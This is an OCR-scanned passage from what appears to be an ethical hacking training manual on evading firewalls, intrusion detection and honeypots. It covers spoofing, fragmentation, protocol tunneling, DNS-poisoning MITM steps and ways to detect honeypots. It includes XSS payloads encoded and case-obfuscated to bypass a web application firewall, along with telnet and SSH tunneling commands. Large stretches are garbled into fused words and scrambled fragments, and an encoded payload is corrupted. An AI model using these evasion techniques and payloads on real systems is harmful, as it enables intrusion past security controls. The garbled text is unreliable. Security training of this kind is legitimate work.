threeprimary services thatsendout bannersa re FTP,Telnet,andwebservers.
A firewall does not block banner grabbing
becausethe connection betweenthe
attacker'ssystemand the targetsystemappearslegitimate. An example of SMTP
banner
grabbing
Thesyntaxis
is telnet
“<service
mail.targetcompany.org
name > <service
25.
afew
andpressesEnter times,
C:\>telnet www.corleone.com
ifrequired,
80
the result:
it displaysfollowing
ical andCountermensores
Mackin ©by E-Comel
Copyright
IP AddressSpoofing
IPaddress
hisfher
spoofing
identity
spoof asacess
i hijacking
website,
hijack
browsers,
gain
Itcan beusedto a
i n which an
technique atackermasquerades
r
trusted hostt o conceal
unauthorized toa network
modify
_tacers
the to
‘order bite
theaddressing
bypass firewall
information
intheIPpacket
header
andthe source addres il in
ost
Cy
ofthe
molouspacets
Amasqurads
dress
as
he
ost medyingh e?
that ners
IP AddressSpoofing
Mostfirewallsfilter packets
basedon the source IPaddress. Thesefirewallsexamine the source
IP addressanddeterminewhetherthe packet is comingfrom a legitimate source or an
illegitimate
source. The IDSfilters packets from illegitimate
sources. Attackersuse the IP
spoofingtechnique
IPaddress spoofing
such
to bypass firewalls.
is a hijackingtechniquein which an attackermasquerades as a trustedhost
to concealhis identity, spoofa website, hijack browsers, or gain unauthorized access to a
network.In IP spoofing, creates IP packets
the attacker byusinga forged IPaddressandgains
access to the system or networkwithout authorization.Attackersmodify the addressing
information i n the IP packet header andthesource address bitsfieldto bypass
thefirewall.The
attackerspoofs the message;therefore, the destinationhostthinksthat it hascome from a
reliable source. Thus,the attackersucceeds i n impersonating otherswith the helpof IP
spoofing. Hackersu se this technique to avoiddetectionduring spammingand various other
activities.
Forexample, let us
‘Amasquerades consider
A, C.
threehosts: B,and HostCisa trustedmachine
as hostCbymodifying
sendto host8. When thepackets of
the IPaddressthe maliciouspackets
hostB thinksthatthey
are received,
Host
that it intendsto
a re fromhostC,but they
ofhost
8.
are actually
fromhost
A.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Host8
DestinationAddress
10.0.0.1
Source
Address:
10.0.0.2
|" .
10.0.0.2 .
HostC:Trusted
Machine
12.40:Evading
Figure
IP
Firewal Spoting
using Address
ical andCountermensores
Mackin ©by E-Comel
Copyright
SourceRouting
©.Source
packs
l ows the sender
routing
thenetwork
of specttheroutethepacket
to partly or completely ake through
thetravels
chooses the network,
(©As packet
router
examines
thenexthop
(©nsource routing,
I
trough nodesinthe
to eect the packet
thesender makes
each
tothe destination
some or alof thesedecisions
the destination ade
on therouter
and
The
gre shows
SourceRouting
Usingthistechnique,the senderof the packetdesignates the route (partially
or entirely)
that a
packet shouldtakethrough the networksuchthatthe designated route shouldbypass the
firewallnode.Thus,
theattackerc an evadefirewallrestrictions.
Whenthesepackets travelthrough the networknodes, eachrouter examines the destinationIP
sendermakessome the
addressandchooses next hopto directthe packet destination.
or allof thesedecisions
o n the router. to
the the
In source routing,
Source routing
is categorized
into two approaches:
loosesource routing
and strict source
routing.In loosesource routing,the senderspecifies one or more stages that the packetmust
go through, whereasi n strict source routing,the senderspecifiesthe exact route the packet
must go through
figure
‘The belowshowssource routing,
wherethe originator
dictatestheeventualroute of the
traffic,
ical andCountermensores
Mackin ©by E-Comel
Copyright
TinyFragments
TinyFragments
Attackerscreate tinyfragments of outgoingpackets,forcing
s ome of the TCPpacket's header
information into thenextfragment. TheIDSfilterrulesthatspecifypatternswill not matchwith
the fragmented packetsowing to the brokenheaderinformation.Theattackwill succeed if the
filtering
router examines onlythe first fragment andallowsall the other fragments to pass
through. Thisattackis usedto avoiduser-definedfilteringrules and workswhenthe firewall
checks onlyfor theTCPheaderinformation.
‘.3ar0u1080« it, Offset=0
Fragment
Source
Port Destination
Port
Number
Sequence
[Acknowledgement
Sequence
Reserved
Dataotter 1
Number
Window
Checksum UrgentPointer=o
header Figure
12.42:TCP format
ical andCountermensores
Mackin ©by E-Comel
Copyright
BlockedSitesUsing
Bypass a n IPAddressin Placeof a URL
Thismethod
blocked
website's
domain
ying the I address
involve
name
directintothebrowse’
address
ba
i ofple ying the
@
a
"eet ste Dog stare vas
te abe seve we seer
BlockedSitesUsing
Bypass an
IP
Thismethodinvolvestyping blockedwebsite’s
a
Addressin Placeof URL
directly
IPaddress
a
i n the browser's
addressbar
insteadofthe domainname. Forexample, to accessFacebook, typeits IP address insteadof
typingits domainname. Useservices suchas Host2ip
to find the IP addressof the blocked
fails software
Thismethod ifthe blocking
‘website.
trackssent
tothe
web the IP address server.
, . =—
12.4: Bypass
Figure
sites
blocked
using ofthe
theIPadressinstead URL
Module2 1557
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
BlockedSitesUsing
Bypass WebsiteSurfing
Anonymous Sites
ntine
websites
18.Some
that
enable
{©Thereare many
options on
eneryptthe
provide
the
anonymiter
to
services
URES
surfing
anonymous
ofthe websites
internet
hide
|G.These
the
actual
Paddress
ofthe
services
surfer
enable
bypassing
the and IP-based
firewall
‘Anonymizers
EDex:s0
ononmtercom
Eh reeimnnorortecom
doomgro
-ntos:/fononmoue-ponyserverset
ioe fodrog.comt
tp//
tpn? anyoecom
com)
spp
eps/fronycom pf ame
BlockedSitesUsing
Bypass WebsiteSurfing
Anonymous Sites
Anonymous web-surfing sites helpto browsethe Internet anonymously and unblockblocked
sites (ie., evadefirewallrestrictions). Byusing thesesites,you can surfrestrictedsites
anonymously without revealing your IP address.Various anonymousweb-surfing sites
available,some of which provide optionsto encryptwebsiteURLs.
Thefollowing is the list of proxyservers that can help
you to accessblockedwebsites.These
proxy websiteswill hide the actualIP addressand showanother IP address, whichcould
preventthe websitefrombeing blocked,thereby allowing
access.
‘Anonymizer
Source:https://www.ononymizer.com
‘Anonymizer’s
VPNroutes all the traffic through tunnel directly
an encrypted fromyour laptop
to secure andhardenservers and networks.It then masksthe realIP addressto ensure
complete
andcontinuous anonymity
for al onlineactivities.
Someonlineanonymizers
include:
=
https://www
free-proxy.com http://anonymouse.org
=
https://anonymous-proxy- https://www.boomproxy.com
servers.net
hittp://ww7.anype.com
ttps://zendproxy.com hnttps://wwwspysurfing.com
ttpsi//proxify.com
nttp://www.guardster.com
ical andCountermensores
Mackin ©by E-Comel
Copyright
Bypass
a Firewall Using
a Proxy
Server
Bypass
a Firewall Using
a Proxy
Server
to befollowed
Steps a firewallusinga proxyserver:
to bypass
1. Finda n appropriate
proxy server
2. Inthe Toolsmenu
Propertiesdialog of
any Internet browser,
boxunderConnections
Settings,―
go to “Proxy
tab,click"LANsettings―
and i n the Internet
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing the ICMPTunneling
Method
"STportions
ands
rot
xinefhe nybenthe
prin bir
parton byt irewals,us cn etd peed
Firewalls through
Bypassing the ICMP Tunneling
Method
TheICMPprotocol is usedto sendan
networkcommunication,
not entail a significant
error
message
users oftenenable
to the client.As it is a required
this service on theirnetworks.
threatfromthe security
perspective.
service for
Moreover,
Theattackertakesadvantage
it does
of the
enabled ICMPprotocol
ICMP
tunneling
on the networkandperforms
data into the targetnetwork.The ICMPtunnel provides
networks.
to sendhis/her malicious
attackerswith full access to target
<
Unwrapc ommand erste
Tocawrapsouta i m AP
Ficewall "Echo
Pucheta ndreends Internet Cent
12:4;
Figure
Bypassing
frewal
ICMP through tunneling
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing theACKTunneling
Method
Ac allows
tunneling a backdoor
tunneling withTP packets
application withtheACKbitset
(©
T h eAck
Some
isuse to acknowledge
firewallsdonotcheck
tate
response to leptimate
packets
ofa
the receipt
packet
areto
be
withtheACKbitset because
ROKbts supposed usedi n
(©Toots
such
ae Ackomd canbeweed
hetp:/ntsecuniy.n) to implement
ACKtunnting
i= §_.&
Firewalls through
Bypassing theACK Tunneling
method
Ordinary
packet
filtering
firewallsdefinetheir rule setsbasedo n theSYNpacket
whenTCPlevel
communication is to beestablished. sucha firewalla ssumesthat onlythe SYN
Thisis because
packet
is comingfromthe clientandis thuslikely codein the SYNpacket.
to contain malicious
Thesefirewallsignorethepossibility
thatthe attacker
can alsoinjectmalicious
codei n the ACK
packet. AsACKpackets are sent after establishing
a session,ACKtrafficis consideredlegitimate
the filtering
In addition, of ACKpackets is ignored
to reducethe workloadof firewalls, as there
can be manyACKpackets for one SYNpacket. ACKtunneling allowstunneling of a backdoor
applicationwith TCP packets with the ACKbit set. TheACKbit acknowledges the receiptof a
packet, Asstatedearlier, some firewallsdo not checkpackets with the ACKbit set,because ACK
bitsare supposed to be usedi n responseto legitimatetrafficthat hasalready beenallowedto
pass through. Attackers exploitthis fact i n ACK tunneling, Tools such as AckCmd
(http://ntsecurity.nu)
use ACKtunneling,
‘Internetclient
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing the HTTPTunneling
Method
HTP Tuoeling allowsattackers
technology
o various
perform internett asks
d espitetherestcons imposed
This
m ethod
a
the targetcompanyhas publiw eb server, withpor 80used
canbe implemented for
HTTP
wil
enable
the
©.
use
of HTTP
tunneling FTP
via the protocol
¢
°c
Module2 1562
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Tools
HTTPTunneling
1 sow
irPe
rots
Yow
pronyou
|| it
yuto HTTP whchiabodtig om Atwo-wey tna omen
tn
comptes
2-3 ga
Firewalls through
Bypassing the HTTP Tunneling
Method
HTTPtunneling allowsattackersto perform various Internet tasksdespite the restrictions
imposed byfirewalls.Thismethodcan beimplemented if thetargetcompanyhasa public web
server in whichport80 is usedfor HTTPtraffic that is unfilteredbyits firewall.Theattacker
encapsulates data insideHTTPtraffic(viaport80).Many
of an HTTPpacket
port80,
to confirmthat it is legitimate.
firewallsdo not examine payload
Thus,i t is possible
to tunneltrafficvia TCP the
Toolssuchas HTTPTunnel (http://http-tunnel-sourceforge.net)
use thistechnique of tunneling
trafficacross TCPport80.HTTPTunnel is a client/server
application,
theclientapplicationis htc,
andthe server is hts.Uploadthe server to thetargetsystemand redirectit through TCPport
= :+ D>‘Ha >
Figure
12.46:
BELPER
firewall
Bypassing troughHTTP
tunneling
Why
HTTP
HTTP
Tunneling? granted
doI Need
tunneling is usedi n scenarios in whichnetworkusers are restrictedconnectivity
a firewall or proxy; in suchconditions,
through some applications
may also lack native
communications support.
Surfing
blocked
websites
Posting
in forumsanonymously
az
HTTPTunneling
Tools
SomeHTTPtunneling
toolsare as follows:
=
NetworkTunnel
Super
Source:http://www.networktunnel.net
SuperNetworkTunnel is a two-wayHTTPtunneling softwarethat connects two
computersusing HTTP-TunnelClient and HTTP-TunnelServer.It works like VPN
tunneling but uses the HTTPprotocol to establisha connection for accessing the
andprovides
Internet without monitoring an extra layerof protection
againstattackers,
spyware,identity theft,and so on. It can bypass any firewallto surfthe web,use IM
ical andCountermensores
Mackin ©by E-Comel
Copyright
applications,
games,andso on. Further, the SocksCap
it integrates functionalong
with
bidirectionalHTTPtunneling
andremote controlto simplify
the configuration.
Thistool allowsHTTP, HTTPS, andSOCKStunneling of any TCPcommunication between
any client-serversystems, TheTCPtraffic is sent from the client to the server via
standard HTTP POST requests, which allows penetrating throughfirewalls,proxy
servers, andso on, whereHTTP trafficpasses,
Theclientsideof a tunnel is the Super NetworkTunnelclientapp, whichlistenson a
particularTCPportfor incomingrequests. Oncetherequest comes,theprogramcreates
and
an HTTP/HTTPS
server
a
tunnelto theserver sendsdatathrough
NetworkTunnelserver, whichsimply
runningon the server computer
it. The side is Super
forwardsthe data to the intendedrecipientapp
or LAN.Bothclientand server sidessupportmultiple
tunnels
multiple
through
and
the connections same tunnelat the same time.
4%
Oo. B-.2
ot
onCoered ClovTaatnecccecnieaa
Toto
[erie
Source:https://www.targeted.org
HTTPortallowsusers to bypass the HTTPproxy,whichblocksInternetaccessto e-mail,
instant messengers,P2? file sharing,ICQ,News,FTP,IRC, and so on. Here,the Internet
softwareis configured so that it connectsto a localPCas if itis the required remote
server. HTTPort then intercepts that connection and runs it through a tunnel through
the proxy.HTTPortc an work on devicessuchas proxiesor firewallsthat allow HTTP
traffic.Thus,HTTPort providesaccess to websites and Internet apps. HTTPort performs
tunneling
of
usingone two modes:SSL/CONNECT
ical
modeor a remote host.
andCountermensores
Mackin ©by E-Comel
Copyright
In the SSL/CONNECT mode,HTTPortcan makea tunnel through a proxyall byitself.It
to
requests the HTTHost.Theproxy responds
allowsthe user to do so. HTTHost,
as
if
in turn, performs a
the user is surfingwebsite andthus
its halfof the tunneling
communicates with the targetservers. Thismode is muchslowerbut worksi n most
and
fb tthe
1 2.49:Screenshot
Figure of HTTPortand HTTHost
Other HTTPTunneling
Tools
© Tuna (https://github.com)
© HTTPTunnel(http://http-tunnel.sourceforge.net)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing the SSHTunneling
Method
openssat
pensst |
|
MtiekersureOpenSSH to
eneryt
net avoid detection the
traffic
machine
remote
andtuna
bytheperimeter
secu controls
rom l oa ta
SSHTunneling
Tools:Bitvise and Secure Pipes
SecurePipes
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackersuse OpenSSH(OpenBSD SecureShell) andtunnelall trafficfroma local
to encrypt
machineto a remote machineto avoiddetectionbyperimetersecuritycontrols.OpenSSHis a
set of computerprogramsthat provideencrypted communication sessionsover a computer
networkusing theSSHprotocol.
Example:
ssh -f usergcertifiedhacker.com -L 5000:certifiedhacker.com:25 -N
=>=>
-£ =>
background
mode,user@certifiedhacker.com username and server
you are
logging
into,-L 5000: certifiedhacker.com:25 local-port:host:remote-port,
and -N
Do not execute thecommand o n the remote system.
«
os.oF,
Tunneling
‘SSH Tools
SomeSSHtunneling
toolsare listedbelow:
Source:https://www.bitvise.com
BitviseSSHServerprovides secure remote login capabilitiesto Windows workstations
andservers byencrypting dataduring transmission.Itis idealfor remote administration
of Windowsservers, for advanced users whowishto accesstheirhomemachine from
work or their work machinefrom home,and for a wide spectrum of advancedtasks,
suchas establishinga VPN usingthe SSHTCP/IP tunneling featureor providing a secure
file
depository
SFTP.
using
BitviseSSHClient for Windowsincludesterminal emulation,graphical as well as
command-line SFTPsupport,an FTP-to-SFTP bridge, tunneling features—including
dynamic portforwarding through an integrated proxy—and remote administrationfor
SSHServer.
ical andCountermensores
Mackin ©by E-Comel
Copyright
12:51:
Figure Sereenshotof
vise
SecurePipes
Source:https://www.opoet.com
Secure Pipes SSHtunneling
is an OSX-based software.Some of the featuresof Secure
Pipes
©
are
as follows:
RemoteForwards:Selectively openup accessto application portsthat are usually
not easily owingto networkor service provider
accessible configurationrestrictions.
Open the door to quickly
leverage
OSXServero n Internet-facing applications such
as emailand web hosting,
LocalForwards:Open application
communication ports to remote servers without
openingthoseportsto public networks.Bring the security
of VPNcommunication to
clientsand servers on an ad hoc basiswithout the hassleof configuration and
management.
SOCKS Proxies:Easily
set up and managea SOCKS proxy server for either a local
client or a wholenetworkto privatizecommunication andovercome localnetwork
restrictions.Thesetunnelsare an indispensable
and lightweight tool whentraveling
abroad, performingdigital or simply
currency transactions, securinga localnetwork.
12:52:
Figure Screenshot
ofSecurePipes
ical andCountermensores
Mackin ©by E-Comel
Copyright
Bypassing theDNSTunneling
Firewalls through Method
Thissmal
by
sie constrant on extemal
exfitration various malicious
queries
enttes
allows
the ONStobeusedas an
eal hole to perform
data
‘Since
corvptor malicious
datacanbe
<etec this abnormality sscrety
n ONStunneling
embedded
int theONS
protocol even ONSSEC
packets, cannot
1s effectively selbymalware
andtheC&C sever
to bypass
communication
between
thefirewallo maintain thevet machine
5 NST (ps/soureforge.net),
Heyoka (it:/heyokosourceforge
traffic
Tools
such netus),and
lone (htos//c0dekro.se)
ve thistechni of tunneling across DNS
p ot 53
Firewalls through
Bypassing the DNSTunneling
Method
DNSoperates usingUDP, and it hasa 255-byte limit on outbound queries.Moreover, it allows
onlyalphanumeric charactersand hyphens. Suchsmallsize constraints on externalqueries
allow DNSto be usedas an idealchoice to perform data exfiltration byvarious malicious
entities. Since corruptor maliciousdata can be secretly embeddedinto the DNSprotocol
packets, even DNSSEC
malwareto bypass
cannot detectthe abnormality i n DNS
tunneling.
It is effectively
the firewallto maintain communication betweenthe victim machineand
usedby
the
C&C
server.
Toolssuchas NSTX(httos://sourceforge.net), Heyoka (http://heyoka.sourceforge.netuse), and
lodine (https://code.kryo.se)use thistechniqueof tunneling trafficacross DNSport53.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing External Systems
© Me
icon
|@ Meron
Am maraeeteraoten @Ths enroom commande
et
thao
ven taker we
DSB
Firewalls through
Bypassing External Systems
Attackers can bypass firewallrestrictions of targetnetworksfroman externalsystem
that can
access the internalnetwork.Thisexternalsystem can be:
+
=
Ahome
machine
ofemployee
Amachinethatconducts
and
remote administration
ofthetargetnetwork
=
networkbutlocatedat a different
Amachinefromthe company’s place
Steps
to befollowed
4.
to a
bypassfirewallthrough
externalsystems:
user workswith some externalsystem
Legitimate to access the corporate
network
2. Attackersniffsthe user trafficandstealsthe session ID andcookies
3. Attacker accessesthe corporate networkbybypassing the firewalland gets the
WindowsIDof the running Mozillaprocesson the user'ssystem
Attackerthen issues an OpenURL()
command
to the foundwindow
User’s
web browser to the attacker's
is redirected webserver
Themalicious
codeembeddedi n the attacker'swebpageis downloaded
andexecuted
onuser’s
the machine
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing MITM Attacks
(©inwiTmattacks,
attackers make
use
of
ONS
serversandrouting
techniques firewallrestrictions
to bypass
evnceecmcer|| EB?
EBEs
fe
e
—— =
&
Firewalls through
Bypassing MITM Attacks
Most securityadministratorsfocuson the possibility of an external or internal network
bypassing their firewallwhileignoringthe factthat firewallscan be bypassed usingMITM
attackson DNSservers. In MITM attacks, attackersuse DNSservers and routingtechniquesto
bypass firewallrestrictions. They mayeithertake over the corporate DNSserver or spoof ONS
responses to perform the MITM firewallattack.
Stepsto befollowedto bypass a firewallthrough MITM attacks:
1. Attackerperforms
DNS
server
poisoning
A forwww.certifiedhacker.com
2 User requests fromthecorporate
DNSserver sendsthe IPaddress(127.22.16.64)
3 Corporate
DNSserver
oftheattacker
A
4. User accesses
theattacker'smalicious
server
5 Attackerconnectsto the realhostandtunnelsthe user’s
HTTPtraffic
6. Themalicious
codeembeddedi n the attacker'sweb pageis downloadedandexecuted
on the user's machine
ical andCountermensores
Mackin ©by E-Comel
Copyright
Firewallsthrough
Bypassing Content
Examples:
Sending
an
email
containing
ofa macro bypass
capable
a
exploit
executable
malicious
file
Microsoft
or ofce document
Firewalls through
Bypassing Content
In this method,the attackersendscontent containing maliciouscode to the user and tricks
him/her into openingit so that the maliciouscodecan beexecuted. Forexample, an attacker
can senda n emailcontaining 2 maliciousexecutablefile or Microsoftofficedocumentcapable
of exploiting a macro bypass exploit.Attackers can alsotarget WWW/FTP servers and embed
Trojan horsefilesas softwareinstallationfiles,mobilephone software,
andso on to lure users
into accessing them.Thereare many file formatsfor text, multimedia, and graphics content
that can beusedto carry
Commonly
malicious
content.
usedfile formatsfor carrying maliciouscontent are
+
COM,BAT,PS,PDFCDR(Corel
EXE, Draw)
+
DVB,DWG(AutoCAD)
=
SMM (AMI
Pro}
+
DOC,
XLS,
DOT,
XLB,
Word)
CNY,
ASD(MS
Excel)Access)
XLT(MS
ADP,MDA,MDB, MDZ(MS
MDE,MON,
V0
(Visio)
MPP,MPT(MS
Project)
PPT,PPS,
POT(MSPowerPoint)
MSG,
OTM(MS
Outlook)
ical andCountermensores
Mackin ©by E-Comel
Copyright
theWAFusing an XSSAttack
Bypassing
attack
server input
responsesin
and the
‘end-users of
the
"@ANXSS expats wloerabties
|G -tocers injecmalcous
that ocur whileprocessing parameters
H TMLcode
a webaplication
Inthevictim webste to bypass
theWAF
“©
consider thefolowing
X S payload
to the
ASCHvalues bypass WAF
‘Using
Hexto
bypass
the
WAF
‘UsingEncoding
Aer the WA
Obfarcation to bypass
‘Using
12 encoding
te 5 poond,
=
Using
bypass
ASCIIvaluesto
In this technique,
theWAF
attackersuse ASCIIcharactersto bypass the WAF.For example,
the
consider
<script>alert
XSS
following payload
</script>
("SS")
Whenthe aboveJavaScript the WAFfiltersescapesingle
codeis executed, quotes,
doublemagic quotes,etc. Hence,
the abovepayloadis filtered bythe WAF.To bypass
the WAF,we needto convert the abovepayloadinto its equivalent ASCIIvaluesand
then execute it. TheJavaScriptwill automatically
convert the ASCIIvaluesbackinto the
originalcharacters. to convert an XSSpayload
Attackersuse online websites into its
ASCIIequivalent. Alternatively,
the HackbarMozillaaddoncan be used to get ASCII
values.
Consider the XSSpayload givenbelow:
X35 Payload:alert ("X35")
Theequivalent ASCIIvaluesare
String. fronCharCode(97,108, 101, 114, 116, 40
Theabovevaluesare insertedinto the XSSpayload:
34,
Theabovepayload theWAFfilters
bypasses
(97,successfully
<acript>String.fromCharCode 108, 101, 114 Fry
41)</script>
Theencodedvaluefor theXSSpayload
is
34724698708
7443E.
Theabovepayload
7386
830873%6396987247087493E06186C65872¢7482082245985385342242983C82F
bypasses
the WAFfilterssuccessfully.
Using Obfuscation to bypass
theWAF
Attackersuse the obfuscationtechnique
to bypass the WAF.In thistechnique,
attackers
use a combinationof upper-and lower-caseletters i n the XSSpayload.
For example,
considerthe followingXSSpayload:
<scriptoalert </script>
("X58")
theabovepayload
obfuscation,
Using is replaced
with
</script>
<SCRiPt>abeRT("X88")
Theabovepayload
bypassestheWAFsuccessfully
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
@ | wore teaon
IDS/FirewallEvading
Tools
19
‘TraficProfessional
IDS/Firewall Tools
Evading
During firewall evasion, attackersuse various security-auditing
tools that assess firewall
behavior.This section lists some of these tools that helpattackersto bypass firewall
restrictions. Theyautomate the processof bypassing firewall rules while increasing
effectiveness andconsuming lesstime.
ical
Mackin
and ©by CountermensoresCopyright
E-Comel
Traffic1@
Professional
Source:https://www.idappcom.com
Traffic1QProfessional
is a tool that auditsandvalidatesthe behaviorof security
devices
bygenerating the standardapplication trafficor attack trafficbetweentwo virtual
machines.Thistool is generally
usedbysecurity personnel for assessing,auditing, and
testingthebehavioral characteristics ofanynon-proxypacket-filtering device, whichcan
includeapplicationfirewalls,
IDS, IPS,routers, switches, etc. However, as this tool can
generate custom attacktraffic,i t is extensivelyemployed by attackers to bypass the
perimeter
installed devicesi n the targetnetwork.
5 3
SomeadditionalDS/firewall
12.5: Screenshot
Figure
evasion toolsare as
of
Trafic
follows:
a Professional
=
Nmap(https://nmap.org)
=
(https://www.metasploit.com)
Metasploit
=
Inundator(https://sourceforge.net)
(https://github.com)
IDS-Evasion
(hetp://nullsecurity.net)
Hyperion-2.0
ical andCountermensores
Mackin ©by E-Comel
Copyright
PacketFragment
GeneratorTools
PacketFragment GeneratorTools
Thereare various packetfragment that attackersuse
generators to perform
fragmentation
attacks
o n firewalls
to bypassthem.
=
Colasoft PacketBuilder
Source:https://www.colasoft.com
ColasoftPacketBuilder is used to create custom network packets and fragmenting
packets.
Attackers use thistoolto create custom malicious andfragment
packets them
suchthat firewallscannot detectthem.They can create customnetworkpacketssuchas
EthernetPacket,ARP Packet, IP Packet, TCPPacket, and UDP Packet.Security
professionals use this tool to checkyour network'sprotection againstattacksand
intruders.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
22.56:
Screenshot
ofColasoft
Packet
Builder
Someadditionalpacket toolsare listedbelow:
generator
=
CommView (https://vww.tamos.com)
Pro(https://www.netscantools.com)
NetScanTools
*
Ostinato(https://ostinato.org)
WANKiller(https://www.solarwinds.com)
WireE
it (https://wireedit.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
1S, 1P5,Firewall,andHoneypot
Detecting
Honeypots
(©Atacers
can of by
determinethepresence
honeypot theservices running
probing onthe system
specif
service
Ports
a
that show
a
connection runningbt handshake
deny three-way inate the presence
ols safe
oneypot
detet
ooo to detect
detoct honeypots:
1
©
Send
ope
Hater(ta:/mwmsendsofecom)
tpe//oeha.com)
Detecting
Honeypots
are trapsset to detect,
Honeypots deflect,
or counteract unauthorizedintrusion attempts.
Whileattempting to breakinto the targetnetwork,attackersperform
honeypot detectionusing
various toolsandtechniques. thesetoolsandhowthey
Thissection discusses a re used.
honeypot
‘A is an Internet systemdesignedprimarily
for diverting bytricking
attackers or
attractingthem duringtheir attemptsto gain unauthorizedaccess to informationsystems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers can determinethe presenceof honeypots byprobingthe services runningon the
system.Attackersuse honeypot detection systemsor methodsto identify the honeypots
particular
They
craft
installedo n the targetnetwork.
HTTPover SSL(HTTPS), SMTPover SSL(SMPTS),
service runningbut denya three-way
probe
malicious packets
to scan forservices suchas
andIMAPover SSL(IMAPS).
handshake
Portsthat show
connection indicatethepresenceof a
a honeypot.Oncetheydetecthoneypots, attackerstryto bypassthem so that theycan focus
the actualnetwork.
on targeting Toolsto detecthoneypots includeSend-safe Honeypot Hunter
(http://www.send-safe.com)
and kippo_detect(https://github.com),
Note: Attackerscan also defeat honeypots
byusing multi-proxies and hiding
(TORs) their
and
steganography
conversation usingencryption
techniques.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Detecting
and Defeating
Honeypots
by 2
(@ famataceris presenton thesme networkastheLayer aps, ten thetake an
which
of
black
detectthe presnceof
ths daemon lookingat theresponseswithuniqueMACaddress
set et at nd hole
theIEEE
‘observe
MAC
forthe currant
s tandards of
ange addresses
and to VMWare
Ie
the
Detecting presence
|
Detecting
and Defeating
Honeypots
(Cont'd)
‘Anal
2s
thees such /poe/mouns,foceitertups
andproce, whiehcontain
Se logs tat
everyting acest a rea before othe
transerngt network,
|, ©outzinsone
srahz the
Snater
packets
packet pacts opiate
hot sytemandidentyng
te
med
medeaon
through
‘Observe
TCP/IP
parameters
sucha ive
spec Run
epT e the T i m e
(RTT) To (T70,
SO
Detecting and Defeating Honeypots Eee
A honeypot is a security mechanism that is deployedto counterattackandtrap attackers.
Honeypotslure attackersinto performing maliciousactivities,
and this attack information
provides
insights into the leveland typeof threatsa network infrastructure can face.As an
attacker,
determining whetherthe targetsystemis a legitimate one or a honeypot is essential
to compromise the networkwithoutbeing detected.Identifying anddefeating thesehoneypot
stealthily
establishments taskof a professional
is the fundamental hacker.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Sometechniques used to identify,
detect,and defeatvarious honeypot
infrastructures
are
discussed
below:
Detecting the presenceof Layer 7 Tar Pits:Tar pitsare security entities that are similar
to honeypots, whichare designed to respond slowly to incomingrequests. They slow
downunauthorizedattemptsof hackers.Layer 7 tar pitsreact slowly to incomingSMTP
commands byattackers/spammers. Attackerscan identify the presenceof Layer 7 tar
pitsbylooking at the latency
of the responsefromthe service.
Detecting thepresenceof Layer 4 TarPits:Layer 4 tar pitsmanipulate theTCP/IP stack
and are effectivelyemployed to slowdownthe spreading of worms, backdoors, etc. In
thesetar pits,the iptablesaccept the incomingTCP/IP connection and spontaneously
switchto a zero-windowsize, blocking the attackerfrom sending further data.This
connection cannot beterminatedbythe attacker, as n o data is transferred to the target
machine.Layer 4 tar pitssuchas Labreacan be identifiedbytheattackerbyanalyzing
the TCP windowsize, wherethe tar pit continuously acknowledges incomingpackets
even though
theTCPwindowsize is reduced
to zero.
Detecting
the presenceof Layer2 TarPits:If an attackerlaunchesa n attackfromthe
same network,
the issue of Layer 2 tar pitsare usedto blockthe network
2 arises, Layer
of the attackerwho gainsaccess to the network as well as to prevent
penetration
internalthreats.Theattackercan detectthe presence of thisdaemonbylooking at the
responses with the uniqueMACaddress0:0:F-f:ff:ff, whichacts as a kindof blackhole.
attackercan also identify
‘An the presenceof these tar pits byanalyzing the ARP
responses,
Detecting Honeypots runningon VMware:VMWareis a commercially availablevirtual
machinethat is usedto launch multipleinstancesof a n OSsimultaneously. Thesevirtual
machinescan be configured with various virtual machineresources suchas CPU,
memory,disks, I/Odevices,etc. Owing to its numerous advantages, VMWare is widely
usedto launchhoneypots. Attackerscan identify instances that are runningon the
VMWare virtual machinebyanalyzing the MAC address.By looking at the IEEE
standardsforthe current rangeof MACaddresses assigned to VMWareInc., an attacker
can identify
the presenceof VMWare-based honeypots.
Detecting
the presenceof Honeyd Honeyd
Honeypot: used honeypot
is a widely
daemon.It is usedto create thousandsof honeypots easily.It is a network-simulated
andservice-simulatedhoneypot deployment engine.Thishoneyd honeypot can respond
toa remote attackerwho tries to contact theSMTPservice withfakeresponses.
¥ °e e
Lb Ossie —_:,
Figure
fake
12.57:Honeyd cesponse
ical andCountermensores
Mackin ©by E-Comel
Copyright
can identify
{Anattacker the presenceof honeyd honeypot byperforming
time-based
TCPfingerprinting
methods(SYN The following
proxy behavior). figure
showsthe
betweena response to a normalcomputerandthe responseof honeyd
difference
to
a
honeypot manual SYNrequest
sent
by
an attacker
ike
smuncx
Detecting
Figure
to
Scequest
Response
12.58:
YN
by
normal
Honeys
Honeypot
computer
the presenceof User-ModeLinux(UML)
vs.
Honeypot: User-ModeLinux is an
open-sourcesoftwareunderGNU,whichis used to create virtualmachinesand is
efficienti n deploying honeypots.
Attackerscan identify
the presenceof UMLhoneypots
byanalyzing
filessuchas /proc/mounts,
/proc/interrupts,
and/proc/emdline,
which
contain UML-specific
information.
Detecting
the presenceof Sebek-basedHoneypots:
Sebekis a server/client-based
honeypot
application the rootkits andother malicious
that captures malwarethat
hijacks
the read{) systemcall.Suchhoneypots via reading
recordal the dataaccessed ()
call.Attackersc an detectthe existence of Sebek-based honeypotsbyanalyzingthe
congestionin the networklayer,as Sebekdata communication is usually
unencrypted.
SinceSebeklogseverythingthat is accessed
via reading
()callbeforetransferring
to the
network,
it causesthe congestioneffect
Detecting
is mainly
the presenceof Snort_inline
Snort IDSthat is capable
of packet
usedin Genll (2ndgeneration)
Snort
Honeypot: _inline
manipulation.
i s a modifiedversion of
It can rewrite rulesi n theiptables
